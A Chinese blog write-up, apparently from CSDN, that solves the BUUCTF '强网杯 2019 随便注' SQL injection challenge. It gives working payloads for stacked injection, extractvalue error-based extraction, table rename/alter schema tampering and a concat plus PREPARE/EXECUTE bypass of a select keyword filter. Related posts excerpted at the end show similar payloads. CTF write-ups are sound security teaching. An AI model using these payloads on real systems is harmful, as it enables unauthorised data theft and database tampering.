BUUCTF [强网杯 2019]随便注 1(两种方法)

已于 2022-03-05 20:10:44 修改
阅读量1.1w 收藏 44
点赞数 26
分类专栏: buuctf 文章标签: php 开发语言 后端
于 2022-03-05 12:39:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62879498/article/details/123292860
版权

[强网杯 2019]随便注 1

第一步,先判断注入点的传参方式,发现是get传参。

第二步,判断闭合方式:

先输入 1

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Yi4DKfuF-1646482069774)(C:\Users\hcj\AppData\Roaming\Typora\typora-user-images\image-20220305195133940.png)]

然后再尝试输入:1’

在这里插入图片描述

说明了两点:本题的闭合方式确实是 ’ 闭合,同时我们确定在本题我们是有可能是能使用报错注入的。

1’and 1=1-- q

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6TVJTsXi-1646454831105)(C:\Users\hcj\AppData\Roaming\Typora\typora-user-images\image-20220305113641505.png)]

1’and 1=2-- q
在这里插入图片描述

说明闭合方式为 单引号

如果输入1“and 1=1-- q 和1”and 1=2-- q 两次的回显结果一样,说明闭合方式不是 双引号 其他同理

第三步,判断是否有关键字过滤:

先直接输入: select 查看回显,发现:

在这里插入图片描述

发现本题过滤关键字:/select|update|delete|drop|insert|where|\.而且不区分大小写。

坏了,select一被禁用,联合查询,报错注入,布尔,时间盲注就都不可以使用了。我们只剩下了 堆叠注入。

先尝试使用堆叠注入:

1’;show database-- q
在这里插入图片描述

发现可以

1’;show tables-- q

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-U7y6UH7L-1646454831107)(C:\Users\hcj\AppData\Roaming\Typora\typora-user-images\image-20220305115035950.png)]

发现有两个表,我们 一 一 尝试:

 1'; show columns from `words`-- q

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-sX9J7GFe-1646454831108)(C:\Users\hcj\AppData\Roaming\Typora\typora-user-images\image-20220305115416246.png)]

当然在报错注入查询 数据库名字的时候是不用select的,所以在这里我们是可以用的:

1' and (extractvalue(1,concat(0x7e,database(),0x7e)))-- q

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MLi7w87w-1646482178657)(C:\Users\hcj\AppData\Roaming\Typora\typora-user-images\image-20220305200233094.png)]

查询表名:

1'; show columns from `1919810931114514`-- q

在这里插入图片描述

发现flag.

关于在这里使用 ` 而不是 ’ 的一些解释:

两者在linux下和windows下不同,linux下不区分,windows下区分。

单引号 ’ 或双引号主要用于 字符串的引用符号

反勾号 ` 数据库、表、索引、列和别名用的是引用符是反勾号 (注:Esc下面的键)

有MYSQL保留字作为字段的,必须加上反引号来区分!!!

如果是数值,请不要使用引号。

但是,在接着查询 id 就需要 select了

到这里就有两个思路:

第一种:比较骚的思路,让程序中已经存在的select语法帮我们进行查询,把words改名为其他,191这个表改名为words,然后再添加id字段,将flag字段改为data。

  • 先将 words 改为别的名字 比如 words2 或者其他
  • 然后将 1919810931114514 改为 words
  • 把属性名flag改为id,然后用1’ or 1=1;# 显示flag出来
    在这之前当然要先把words表改名为其他

所以我们可以这么构造playload:

1';rename table words to word2;rename table `1919810931114514` to words;ALTER TABLE words ADD id int(10) DEFAULT '12';ALTER TABLE  words CHANGE flag data VARCHAR(100);-- q

1';show tables-- q

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-SB8eiiNX-1646454831109)(C:\Users\hcj\AppData\Roaming\Typora\typora-user-images\image-20220305122753497.png)]

1'; show columns from words-- q

在这里插入图片描述

1'or1=1-- q

在这里插入图片描述

第二种方法:利用concat拼接(mysql的语法知识)

-1’;use supersqli;set @sql=concat(‘s’,'elect flag from 1919810931114514');PREPARE stmt1 FROM @sql;EXECUTE stmt1-- q

这里set为变量赋值

PREPARE设置sql查询语法

EXECUTE 执行函数

hcjtn
关注
  • 26
    点赞
  • 44
    收藏
    觉得还不错? 一键收藏
  • 14
    评论
专栏目录
BUUCTF】web之强网杯2019随便
12-14
开始入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠入: 库:1’;show databases;# 得到数据库 表:1’;show tables;# 得到俩个表 列:1’;show columns from ‘表名’;# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF】[强网杯 2019]随便 1
qq_45972928的博客
05-06 3969
这是一个典型的sql入题目 知识点: 1、入点检测 2、万能匹配 3、暴力获得数据表和其属性 4、sql语句的掌握(order by; union select; rename table; alter table…等等) 1、进入网站 2、看到一个输入框一个提交框,尝试进行数据输入了解大致情况 经过尝试我们发现,只有输入1,2时有显示,输入0或者其他时没有显示 3、测试是否存在入 and 1=1和and 1=2没有变化 在参数后面加单引号,发现错误,可以尝试进行入 4、尝试0‘ or
buuctf[强网杯 2019]随便 1(超详细,三种解法)
最新发布
2401_84968222的博客
05-16 280
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
buuctf web题解之[强网杯 2024]随便1详解(1),程序员怎样优雅度过35岁中年危机
2401_84160087的博客
04-09 368
当我们输入id=1‘的时候,只要他页面有变化,那就是这里可能存在入点但是这里具体是要填id=1‘,还是id=1“,或者是id=1’),那就涉及到闭合方式的判断了。就如上边所说,闭合方式有很多种,我们需要挨个猜常见的闭合方式有成对的’ ‘、” “、( )、(’ ')判断具体是哪种,只能挨个试…直到输入 1’ 页面发生了报错,说明是 ’ 闭合(单引号的闭合)自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技
[强网杯 2019]随便 1
weixin_53150482的博客
06-11 401
BUUCTF[强网杯 2019]随便
[强网杯 2019]随便
m0_56691564的博客
11-30 2659
该题作者在页面就查了这两个字段的内容,由于该题禁用select,因此我们可以用作者原本设定的查表函数来帮我们查我们想要查找的内容。用rename把words表改名为其他的表名,把 1919810931114514表的名字改为words,给words表添加新的列名id,将flag改名为data。大意应该是过滤了select,绕过一下,好的发现绕过不了,不管是编码还是释都不行,因此这个题使用堆叠入。由show的作用可知,words表内就两个字段,一个叫id,一个叫data。
BUUCTF[强网杯 2019]随便 的三种解法
热门推荐
qq_44657899的博客
11-27 2万+
00X01 [强网杯 2019]随便 1’ or 1=1 #
[强网杯 2019]随便1
m0_75178803的博客
11-05 214
打开题目输入1输入1',页面报错,输入1' #页面正常说明1为入点且入方式为字符型的单引号入判断列名输入1' order by 2 # 页面正常1' order by 3 #页面报错说明列名字段数为2接下来我们尝试用联合入的方式爆出数据显示位输入1' union select 1,2 #可以看到过滤了很多东西说明我们用不了联合入,因为过滤了union我们尝试堆叠入来查看有多少个数据库1';我们查看表名1';可以看到当前数据库下有两个表1';
buuctf [强网杯 2019]随便 1
weixin_45642610的博客
01-07 1万+
buuctf web [强网杯 2019]随便 1 -刷题个人日记 小白一个,写给自己看。 打开后是这样。 从题目和内容来看就是一道sql入题。 输入 1' or 1=1;# 这个#用来释掉后面的sql语句 显示所有数据,这个数据有什么用我也不知道,但sql入一般第一步就是这样看看有没有有用的信息(没有)。 输入 1' order by 2;# 1' order by 3;# 到第3列报错,说明只显示两列。 输入1'; show tables;# 可以看到有 191981093
[强网杯 2019]随便1 解题思路(详细版)
qq_61861243的博客
09-24 290
1、首先通过题目,及页面提示,考虑到题目应该利用sql入进行解决,首先试一下万能密码,查看一下回显内容2、既然这样我们就查询一下数据库中的所有表格1';#,这里我们可以得到两个表格words、19198109311145144、查看一下两个表格的信息, 1';#查询words表找到了两个属性一个id 一个data;1';#查询1919810931114514表我们发现有关flag的提示词。3、根据上一步题目查询我们可以推测出页面在所有访问过程中的回显,都是回显的words的内容。
BUUCTF逆向前八题
01-24
在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向题目,通过这些题目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。 1. Easyre: 这道题首先使用exeinfo查看文件信息,确认...
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
这类漏洞通常出现在以下几种情况: 1. **全局变量覆盖**: 在PHP 5.3.0之前,如果`register_globals`配置选项设为`ON`,那么HTTP请求中的变量(如GET、POST、COOKIE等)会被自动转换为全局变量。攻击者可以通过...
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF Web [强网杯 2019]随便
wangyuxiang946的博客
10-25 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [强网杯 2019]随便一、题目简介二、思路分析1)判断入点2)选择入方式3)查看表中内容三、解题步骤1)获取表2)获取字段3)获取表中数据四、总结 一、题目简介 进入题目链接后,是一个「查询」功能,在输入框中提交id,即可返回「响应」的内容。 在输入框中输入一个2,即可.
buuctf web题解之[强网杯 2019]随便1详解,网络安全开发了解这些自然无惧面试
m0_60666841的博客
04-07 269
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
[强网杯 2019]随便 1(SQL堆叠入+修改数据库+预处理语句+concat拼接)
Home to come
08-17 934
本文属于个人刷题记录,不会完全描述步骤,而是写自己感触深的知识点。 1.堆叠入原理(stacked injection)   在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠入。 1.1与union查询区别   而union injection(联合入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠
[SQL入][强网杯 2019]随便(三种姿势)
Y4tacker的博客
08-05 8103
文章目录姿势一 ---- 常规堆叠入姿势二---预处理语句姿势三 --- handeler参考文章 前言: 1919810931114514必须用反单引号括起来,但是words不需要,应该是和数据类型有关 姿势一 ---- 常规堆叠入 堆叠入为攻击者提供了很多控制权,与仅限于SELECT语句的UNION联合查询攻击不同,堆叠入可以用于执行任何SQL语句。 首先老规矩输入1 加个单引号,报错 释掉后面大概猜到表的结构了selsect id,data from words where id =,并
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取或者修改数据库中的数据。通常,这种漏洞主要存在于动态网页应用程序中,比如通过用户输入生成SQL查询语句的网页。攻击者可以通过在用户输入的数据中插入SQL代码,从而绕过正常的验证机制,查看、修改或者删除数据库中的数据。 为了解决入漏洞,我们需要在编写动态网页应用程序时,对用户输入的数据进行严格的验证和过滤,避免将恶意代码传递给数据库。 对于buuctf-强网杯2019随便这道题目,我们需要了解题目的具体要求和给定的环境,然后通过分析和尝试来找到漏洞的利用方法。可能的解题思路包括对输入的数据进行SQL入、获取数据库中的信息或者修改数据库中的数据等等。 解决这道题目需要具备一定的网络安全知识和相关工具的使用能力。通过不断的尝试和调试,找到并利用漏洞成功获取到flag(标志),即为完成题目。 总之,buuctf-强网杯2019随便是一道涉及入漏洞的CTF题目,要求我们通过找到并利用漏洞来获取flag。完成这道题目需要一定的网络安全知识和技术。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 14
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值